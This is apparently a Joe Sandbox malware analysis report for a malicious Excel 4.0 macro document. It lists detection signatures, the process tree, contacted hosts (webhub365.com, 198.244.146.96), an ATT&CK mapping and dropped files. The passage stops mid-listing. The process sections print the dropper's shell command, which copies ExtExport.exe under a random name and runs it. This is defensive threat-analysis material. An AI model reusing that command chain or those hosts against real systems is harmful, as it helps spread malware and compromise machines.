Play interactive tour

Edit tour

Analysis Report document-47-2637.xls

Overview

General Information

Sample Name:	document-47-2637.xls
Analysis ID:	432926
MD5:	92dcc47a1a044fc3a2328ec6eef3918b
SHA1:	6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
SHA256:	ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
Tags:	xls
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Sigma detected: Microsoft Office Product Spawning Windows Shell

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1204 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

cmd.exe (PID: 2668 cmdline: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

nnAzot.exe (PID: 2628 cmdline: 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7 MD5: 7F7F391491C315A4A72EFCAC0D34FA93)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, CommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1204, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, ProcessId: 2668

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: document-47-2637.xls	Virustotal: Detection: 26%	Perma Link
Source: document-47-2637.xls	Metadefender: Detection: 22%	Perma Link
Source: document-47-2637.xls	ReversingLabs: Detection: 15%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.22:49165 version: TLS 1.2

Source:	Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.3.dr
Source:	Binary string: extexport.pdb"Oh source: nnAzot.exe, 00000005.00000000.2089060256.0000000000C81000.00000020.00020000.sdmp, nnAzot.exe.3.dr

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Source: global traffic

DNS query: name: webhub365.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.244.146.96:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.244.146.96:443

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: unknown

DNS traffic detected: queries for: webhub365.com

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165

Source: unknown

HTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" and then click "Enable Content". 23 24 25 26 27 28 29 30 31 32 33 34 35
Source: Screenshot number: 4	Screenshot OCR: Enable Content". 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 .I lj 38 , Id q p

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: document-47-2637.xls

Initial sample: CALL

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: document-47-2637.xls

Initial sample: Sheet size: 14533

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 022577F47FB074B7D942C8F01DAAC778B110A373DE03B3B5043E887995B09D52

Source: classification engine

Classification label: mal76.expl.evad.winXLS@5/14@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\18CE0000

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC17A.tmp

Jump to behavior

Source: document-47-2637.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\System32\cmd.exe

Console Write: ...................J............ . . . . . . . .1. .f.i.l.e.(.s.). .c.o.p.i.e.d.........B_.v............................6..........J......J..^..

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: document-47-2637.xls	Virustotal: Detection: 26%
Source: document-47-2637.xls	Metadefender: Detection: 22%
Source: document-47-2637.xls	ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.3.dr
Source:	Binary string: extexport.pdb"Oh source: nnAzot.exe, 00000005.00000000.2089060256.0000000000C81000.00000020.00020000.sdmp, nnAzot.exe.3.dr

Source: document-47-2637.xls

Initial sample: OLE indicators vbamacros = False

Source: document-47-2637.xls

Initial sample: OLE indicators encrypted = True

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_00C84F09 push ecx; ret

5_2_00C84F1C

Source: C:\Windows\System32\cmd.exe

File created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Jump to dropped file

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_00C8230E LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_00C8230E

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: document-47-2637.xls

Stream path 'Workbook' entropy: 7.97723236264 (max. 8.0)

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Code function: 5_2_00C84BBA SetUnhandledExceptionFilter,		5_2_00C84BBA
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Code function: 5_2_00C84F4C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		5_2_00C84F4C

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_00C84DF8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_00C84DF8

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_00C847E2 GetVersionExA,

5_2_00C847E2

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter1	Application Shimming1	Process Injection1	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting2	Boot or Logon Initialization Scripts	Application Shimming1	Disable or Modify Tools1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution23	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	System Information Discovery4	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting2	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information11	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
document-47-2637.xls	26%	Virustotal		Browse
document-47-2637.xls	23%	Metadefender		Browse
document-47-2637.xls	15%	ReversingLabs	Document-Office.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Link
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	0%	Virustotal	Browse
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	2%	Metadefender	Browse
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
webhub365.com	0%	Virustotal		Browse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
webhub365.com	198.244.146.96	true	false	0%, Virustotal, Browse	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.244.146.96	webhub365.com	United States		18630	RIDLEYSD-NETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432926
Start date:	10.06.2021
Start time:	23:33:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	document-47-2637.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.expl.evad.winXLS@5/14@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 88.6%) Quality average: 72.2% Quality standard deviation: 34.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Excluded IPs from analysis (whitelisted): 192.35.177.64, 13.107.4.50, 8.253.207.121, 67.26.137.254, 8.238.28.254, 8.238.85.126, 8.241.90.254 Excluded domains from analysis (whitelisted): au.au-msedge.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, au.c-0001.c-msedge.net, elasticShed.au.au-msedge.net, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net, afdap.au.au-msedge.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	ManyToOneMailMerge Ver 18.2.dotm	Get hash	malicious	Browse	198.244.146.96
	WV Northern Community College.docx	Get hash	malicious	Browse	198.244.146.96
	Tax Folder.doc	Get hash	malicious	Browse	198.244.146.96
	51564.docx	Get hash	malicious	Browse	198.244.146.96
	f.xls	Get hash	malicious	Browse	198.244.146.96
	P.I-84514.doc	Get hash	malicious	Browse	198.244.146.96
	P.I-84512.doc	Get hash	malicious	Browse	198.244.146.96
	swift_euro.docx	Get hash	malicious	Browse	198.244.146.96
	xTnb7uPpSb.xls	Get hash	malicious	Browse	198.244.146.96
	Y8bVoElk4Y.xls	Get hash	malicious	Browse	198.244.146.96
	xTnb7uPpSb.xls	Get hash	malicious	Browse	198.244.146.96
	statistic-608048546.xls	Get hash	malicious	Browse	198.244.146.96
	212161C3EFE82736FA483FC9E168CE71#U007eC2#U007e1B6B2C73#U007e00#U007e1.xlsx	Get hash	malicious	Browse	198.244.146.96
	cryptowall.exe	Get hash	malicious	Browse	198.244.146.96
	invoice-H9247.docx	Get hash	malicious	Browse	198.244.146.96
	T3ZhUk5pyO.xls	Get hash	malicious	Browse	198.244.146.96
	Invoice.xlsm	Get hash	malicious	Browse	198.244.146.96
	Prudential Investment Services.doc	Get hash	malicious	Browse	198.244.146.96
	Donation Receipt 36561536.doc	Get hash	malicious	Browse	198.244.146.96
	cryptowall.exe	Get hash	malicious	Browse	198.244.146.96

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	document-37-1849.xls	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 60080 bytes, 1 file
Category:	dropped
Size (bytes):	60080
Entropy (8bit):	7.995256720209506
Encrypted:	true
SSDEEP:	768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
MD5:	6045BACCF49E1EBA0E674945311A06E6
SHA1:	379C6234849EECEDE26FAD192C2EE59E0F0221CB
SHA-256:	65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
SHA-512:	DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wgX......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..\|\|[.w.M.!<-.}%.C<tDX5\s._..I....nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........\|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1\|.._F.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.114179942967892
Encrypted:	false
SSDEEP:	6:kKXF6e8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:M8kPlE99SNxAhUe3OMx
MD5:	2E7776A8352D7B7340867AA27A128846
SHA1:	FD6DA9992DCEE317941DE8A460F26EBB4FEB94BD
SHA-256:	C708CF029849616022F4F6F176AB59DF8DE3A5AB0E31DBA7B081338001474C41
SHA-512:	0F9164C48E115C7180724B1BCBC52D711E83B17C9E448B8839B5639583BF948EBA0DF9E28B46518CA93488A30E1637C80DA046D5982BF4B31D27150E467DF364
Malicious:	false
Reputation:	low
Preview:	p...... ........Frh..^..(....................................................... ............L......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.0.e.6.c.f.e.3.4.c.d.7.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.035850934668823
Encrypted:	false
SSDEEP:	3:kkFklXQHlXfllXlE/JADkdllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1yWJ/f/:kKXFGADk5liBAIdQZV7QWB
MD5:	221EE22598CAC868C8B16EE6D78B76D1
SHA1:	EEF00367633C5F7FAF69428C39C9107DEB332533
SHA-256:	D0B5F4D8A653A322B01BDF32CB6573DBEFFD78527CEB7BFDA518855D69CB4F79
SHA-512:	8E771B8C3BF7AAA920B177C435979C6947231ABF84654209FD17793ADA0391A52ADF3918F1E01AC37E58945BBD91489CA734F35F22E280A6A2E394320DF3AE34
Malicious:	false
Reputation:	low
Preview:	p...... ....`...~.*..^..(....................................................... .........e..S......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.c.3.6.7.2.e.8.3.f.1.4.0."...

C:\Users\user\AppData\Local\Temp\57CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	68561
Entropy (8bit):	7.608965484613486
Encrypted:	false
SSDEEP:	1536:m+yXkNLPHqvAk/Vi6+YDT7Hbc8hxCCV2D:m+yUNLP4lA6+YHcId2D
MD5:	E7F218C4D29FEBD5A30BB644B9DE75EC
